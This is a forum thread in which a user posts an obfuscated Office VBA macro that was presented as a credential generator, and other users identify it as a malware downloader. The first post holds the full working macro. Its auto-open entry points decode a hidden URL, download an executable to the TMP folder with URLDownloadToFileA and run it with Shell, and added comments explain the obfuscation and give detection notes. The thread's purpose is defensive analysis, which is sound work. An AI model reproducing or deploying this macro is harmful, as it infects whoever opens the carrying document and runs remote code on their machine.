WTF is this

07/12/2016 23:02 md88#1
Could someone explain to me what the hell this is?


Code:
'zFFBhAywllRgYLnoyKnKmCEyXDmEJs

'YhbETcJPctoxcTJ
'HRAgYsJHKEVuoDioyKnKmCEyXDmEJsHRAgYsJHKEVuoDi


' NOTE(review): API import table of an obfuscated downloader macro. Each Declare
' binds a random-looking local name to a real Win32 export through Alias. Of
' the imports below only sJHTZIrjjbBUYp (urlmon!URLDownloadToFileA) is ever
' called (from sxAbpheDixNfjMi); the kernel32 entries are never referenced and
' all share one generic five-argument signature that does not match the named
' exports (GetLastError, for instance, takes no arguments), so they read as
' decoys that pad the import list rather than as working bindings.
' Several decoys also repeat a parameter name inside one signature
' (e.g. ROYynJVXcQsuKiG twice in tNyYXhiAFHhZRg); VBA normally rejects a
' duplicate declaration in a scope, so whether the host actually compiles
' this module as pasted is worth confirming.
' Detection angle: the Alias "URLDownloadToFileA" literal, combined with the
' StrReverse / Chr() chains / Environ$ / Shell sequence further down, is the
' stable signal; every other identifier is random per sample.
#If VBA7 Then
' VBA7 branch: PtrSafe is present but handle and pointer parameters are still
' declared As Long rather than LongPtr. The one live call passes 0 for those
' arguments, so it presumably still works on 64-bit Office — TODO confirm.
Private Declare PtrSafe Function JTibarHrdvYVZVR Lib "kernel32" Alias "ExecuteUmsThread" (ByVal ROYynJVXcQsuKiGMDbSYnftqLuMOTJ As Long, ByVal ROYynJVXcQsuKiGMDbSYnftqLuMOTJ As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare PtrSafe Function tNyYXhiAFHhZRg Lib "kernel32" Alias "TermsrvDeleteKey" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare PtrSafe Function gDVQxUoYzCjMTxD Lib "kernel32" Alias "NlsGetCacheUpdateCount" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiGMDbSYnftqLuMOTJ As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare PtrSafe Function SLHbwHjIWmzUhip Lib "kernel32" Alias "SetComputerNameA" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiGMDbSYnftqLuMOTJ As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare PtrSafe Function eizmBWkygKARsoh Lib "kernel32" Alias "DosFileHandleToWin32Handle" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare PtrSafe Function UqbmgFHhnUZRkcJ Lib "kernel32" Alias "uaw_wcslen" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafyMDbSYnftqLuMOTJ As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare PtrSafe Function jVZYCQGjMRZiSFI Lib "kernel32" Alias "QueryIdleProcessorCycleTime" (ByVal ROYynJVXcQsuKiGkgFgFpjtlINQFBn As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
' The only import that is actually used: (pCaller, szURL, szFileName, dwReserved, lpfnCB).
Private Declare PtrSafe Function sJHTZIrjjbBUYp Lib "urlmon" Alias "URLDownloadToFileA" (ByVal JxdCDRaNebsfgXLkgFgFpjtlINQFBn As Long, ByVal gaIQkTeNYYLjYGq As String, ByVal kgFgFpjtlINQFBnMDbSYnftqLuMOTJ As String, ByVal pmkorfc As Long, ByVal plkmdirfv As Long) As Long
Private Declare PtrSafe Function vhTCTfnaYzjdBZC Lib "kernel32" Alias "RegQueryInfoKeyA" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare PtrSafe Function dYBGNWPziVIPQCj Lib "kernel32" Alias "GetLastError" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
#Else
' Pre-VBA7 (32-bit) branch: same decoy set, same single live import.
Private Declare Function JTibarHrdvYVZVR Lib "kernel32" Alias "ExecuteUmsThread" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiGMDbSYnftqLuMOTJ As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare Function tNyYXhiAFHhZRg Lib "kernel32" Alias "TermsrvDeleteKey" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare Function gDVQxUoYzCjMTxD Lib "kernel32" Alias "NlsGetCacheUpdateCount" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafyMDbSYnftqLuMOTJ As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare Function SLHbwHjIWmzUhip Lib "kernel32" Alias "SetComputerNameA" (ByVal ROYynJVXcQsuKiGMDbSYnftqLuMOTJ As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSbMDbSYnftqLuMOTJ As Long) As Long
Private Declare Function eizmBWkygKARsoh Lib "kernel32" Alias "DosFileHandleToWin32Handle" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiGMDbSYnftqLuMOTJ As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
' The only import that is actually used: (pCaller, szURL, szFileName, dwReserved, lpfnCB).
Private Declare Function sJHTZIrjjbBUYp Lib "urlmon" Alias "URLDownloadToFileA" (ByVal vLOdwEFwafDnIbw As Long, ByVal dpdorjn As String, ByVal rdftemwe As String, ByVal xplmcdy As Long, ByVal eumwxwB As Long) As Long
Private Declare Function UqbmgFHhnUZRkcJ Lib "kernel32" Alias "uaw_wcslen" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare Function jVZYCQGjMRZiSFI Lib "kernel32" Alias "QueryIdleProcessorCycleTime" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiGMDbSYnftqLuMOTJ As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare Function vhTCTfnaYzjdBZC Lib "kernel32" Alias "GetLastError" (ByVal ROYynJVXcQsuKiGMDbSYnftqLuMOTJ As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafyMDbSYnftqLuMOTJ As Long, ByVal tltjGHRXhSZrSbMDbSYnftqLuMOTJ As Long) As Long
#End If

' Dead code: nothing in view calls this Sub. It assigns a junk literal to an
' undeclared name (no Option Explicit is visible, so it becomes an implicit
' Variant). Filler intended to inflate and vary the module.
Private Sub wszKXDPkxrXLoWh()
QhmRMKLkFEYXdnU = "mRhSfNkyegBMpP"
End Sub
' Download wrapper around urlmon!URLDownloadToFileA (imported as sJHTZIrjjbBUYp).
'   bohfkYHcsSmRypP - URL to fetch
'   KpNPSPEzzcDEpEv - local destination path
' Returns: nothing is assigned to the function name, so callers get Empty;
' the HRESULT from the download is discarded and execution continues
' whether or not the file arrived.
' The arithmetic arguments are constants in disguise: 0+2+2-4 = 0 (pCaller),
' 0+0 = 0 (dwReserved), 4-4 = 0 (lpfnCB). They exist only to break simple
' pattern matching on the literal argument list.
' The If block and the commented-out line are filler: PdwMOlUSjYZJDve is
' never assigned anywhere in view, so the comparison is Empty against a
' string and the branch never runs.
Function sxAbpheDixNfjMi(ByVal bohfkYHcsSmRypP As String, ByVal KpNPSPEzzcDEpEv As String)
If PdwMOlUSjYZJDve = "mYptUoNfGKYpOiX" Then
dNCZZWvBkfROnQk = "FIlvLVSNrrandHU"
'FIlvLVSNrrandHU = "PdwMOlUSjYZJDveFIlvLVSNrrandHU"
End If
sJHTZIrjjbBUYp 0 + 2 + 2 - 4, bohfkYHcsSmRypP, KpNPSPEzzcDEpEv, 0 + 0, 4 - 4
'rKQeVikQmQxHoyy=EEvpNwavWLbZEOd
End Function
' Auto-execution entry point: Excel runs a Sub named Auto_Open when the
' workbook is opened with macros enabled. Delegates straight to the payload
' routine fJcsnuRFbMbAWqL.
Sub Auto_Open()
fJcsnuRFbMbAWqL
End Sub
' Auto-execution entry point for Word: a Sub named AutoOpen runs when the
' document is opened with macros enabled. Same payload as Auto_Open, so the
' module fires regardless of which Office host loads it.
Sub AutoOpen()
fJcsnuRFbMbAWqL
End Sub
' String decoder: returns IEldtrDuGlkTjRT reversed (StrReverse). Every
' obfuscated string in the module is stored backwards and passed through here.
' The assignments on either side of the real statement use undeclared names
' that are never set anywhere in view, so the comparison is Empty = Empty
' (True) and the Then-branch assigns Empty to Empty — filler with no effect.
Private Function eMuOewCUhqUazqc(IEldtrDuGlkTjRT)
pkvkfkwruDSKyXdFIlvLVSNrrandHU = vQNuqEpwzAzoWuv
  eMuOewCUhqUazqc = StrReverse(IEldtrDuGlkTjRT)
If pkvkfkwruDSKyXd = vQNuqEpwzAzoWuvFIlvLVSNrrandHU Then vQNuqEpwzAzoWuv = OjEnDLxzLiRxGol
End Function
' Payload routine reached from every Auto_Open / AutoOpen / Workbook_Open entry.
' What it does once the obfuscation is evaluated:
'   1. fEdbtuhFCrgIXL: the Chr() chain spells "exe.zbxrlz/tac.fmop.a//:sptth";
'      reversed by eMuOewCUhqUazqc it becomes the download URL
'      hxxps://a[.]pomf[.]cat/zlrxbz[.]exe (defanged; the thread reports the
'      hosted file as deleted).
'   2. ZjJyWaHzvkqXNmr: StrReverse("lvpc.rvvxwwze") = "ezwwxvvr.cpvl".
'   3. clQJsXVNmotrVpy: the three Chr() sums evaluate to 84, 77, 80, i.e.
'      Environ$("TMP"); the trailing Chr(92) is "\", so the drop path is
'      %TMP%\ezwwxvvr.cpvl.
'   4. sxAbpheDixNfjMi downloads the URL to that path via URLDownloadToFileA;
'      its result is not checked.
'   5. Shell runs the dropped file with vbNormalFocus. The file does not carry
'      an .exe extension; presumably Shell hands the path to the process
'      loader, which accepts a valid PE regardless of extension — TODO confirm.
' All the If blocks and the loose string assignments are inert filler: the
' compared names are never assigned anywhere in view, so each condition tests
' Empty against a literal and never holds.
' Defender notes: observable artefacts are an Office process resolving and
' calling URLDownloadToFileA, a new file in %TMP% with a non-standard
' extension, and Office spawning a child process from %TMP%. No persistence,
' sandbox check or cleanup is present in this routine.
Private Sub fJcsnuRFbMbAWqL()
IVrmWSZgkUIOwZ = RIQWyisqGzGHpy
fEdbtuhFCrgIXL = eMuOewCUhqUazqc(Chr(101) + Chr(120) + Chr(101) + Chr(46) + Chr(122) + Chr(98) + Chr(120) + Chr(114) + Chr(108) + Chr(122) + Chr(47) + Chr(116) + Chr(97) + Chr(99) + Chr(46) + Chr(102) + Chr(109) + Chr(111) + Chr(112) + Chr(46) + Chr(97) + Chr(47) + Chr(47) + Chr(58) + Chr(115) + Chr(112) + Chr(116) + Chr(116) + Chr(104))
If zMNdXbbdNuJUbEu = "DcJZgxAGXUDDlmr" Then
jtVjkqpGpcysKoD = "YbcoZcZQEYswNAK"
snCvChKElHVeGaj = "FCeTWupgQhizbNM"
End If
ZjJyWaHzvkqXNmr = eMuOewCUhqUazqc("lvpc.rvvxwwze")
clQJsXVNmotrVpy = Environ$(Chr(20# + 20# + 30# + 14# + 500# - 500# + 200 - 200) + Chr(80# - 3 + 1# - 1# + 1000# - 1000#) + Chr(40 + 30 + 5 + 5 + 1 + 1 - 2)) + Chr(100# - 8# - 2# + 2#) & ZjJyWaHzvkqXNmr
If pquAZkgqTYOLNqc = "sOGjTHbiIwwUOro" Then
qdeyujadPFejHEM = "dTBpTWfAJNOBjj"
End If
PbnASKbkgjcWPUV = "bygMYYbaqHeSabO"
SGHLCIzJxRDTSPp = "vGPNCFVxBLIntIx"
snCvChKElHVeGaj = "FCeTWupgQhizbNM"
sxAbpheDixNfjMi fEdbtuhFCrgIXL, clQJsXVNmotrVpy
Call Shell(clQJsXVNmotrVpy, vbNormalFocus)
End Sub
' Third entry point, named after the ThisWorkbook event handler. It only fires
' automatically if this code lives in the ThisWorkbook module; in a standard
' module it is just a plain Sub — presumably included so the payload runs
' wherever the module is pasted. Confirm against the container's module type.
Sub Workbook_Open()
fJcsnuRFbMbAWqL
End Sub
that "should" generate a username and a password, but I don't trust it.
07/12/2016 23:24 algernong#2
It downloads and executes a binary.

Edit: This is the file it downloads:
Code:
-deleted
I wouldn't run it anyway. There is no reason to write such cryptic code if it wasn't a virus ...
07/13/2016 00:13 florian0#3
Quote:
Originally Posted by algernong
Edit: This is the file it downloads:
Code:
-deleted
[...]
I wouldn't run it anyway. There is no reason to write such cryptic code if it wasn't a virus ...
This binary identifies as "wextract", a malware dropper from 2008. Somebody really put some effort into making this old piece undetectable. ;D
07/13/2016 08:02 md88#4
Okay, ty guys
07/13/2016 09:39 Devsome#5
#closed - problem solved + DL deleted